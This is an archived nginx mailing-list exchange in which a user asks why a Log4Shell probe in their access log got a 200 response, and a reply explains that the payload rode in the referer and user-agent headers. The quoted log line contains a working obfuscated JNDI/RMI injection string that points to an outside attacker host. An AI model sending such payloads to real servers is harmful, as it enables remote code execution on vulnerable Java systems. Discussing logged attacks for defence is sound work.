200 html return to log4j exploit

Jay Caines-Gooby jay at gooby.org
Mon Dec 20 17:49:48 UTC 2021


The request is for your index page "GET / HTTP/1.1"; that's why your server
responded with 200 OK. The special characters are in the referer and
user-agent fields, as a log4j system would also try to interpolate these,
and thus be vulnerable to the exploit.

On Mon, 20 Dec 2021 at 04:02, lists at lazygranch.com <lists at lazygranch.com>
wrote:

> I don't have any service using java so I don't believe I am subject to
> this exploit. Howerver I am confused why a returned a 200 for this
> request. The special characters in the URL are confusing.
>
> 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +0000] "GET / HTTP/1.1" 706
> "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}"
> "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-"
>
>     log_format  main  '$status $remote_addr - $remote_user
>     [$time_local] "$request" ' '$body_bytes_sent "$http_referer" '
>                       '"$http_user_agent" "$http_x_forwarded_for"';
>
> That is my log format from the nginx.conf.
>
> I now have a map to catch "jndi" in both url and agent. So far so good
> not that it matters much. I just like to gather IP addresses from
> hackers and block their host if it lacks eyeballs,
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
>


-- 
Jay Caines-Gooby
http://jay.gooby.org
jay at gooby.org
+44 (0)7956 182625
twitter, skype & aim: jaygooby
gtalk: jaygooby at gmail.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mailman.nginx.org/pipermail/nginx/attachments/20211220/71c3f84b/attachment.htm>


More information about the nginx mailing list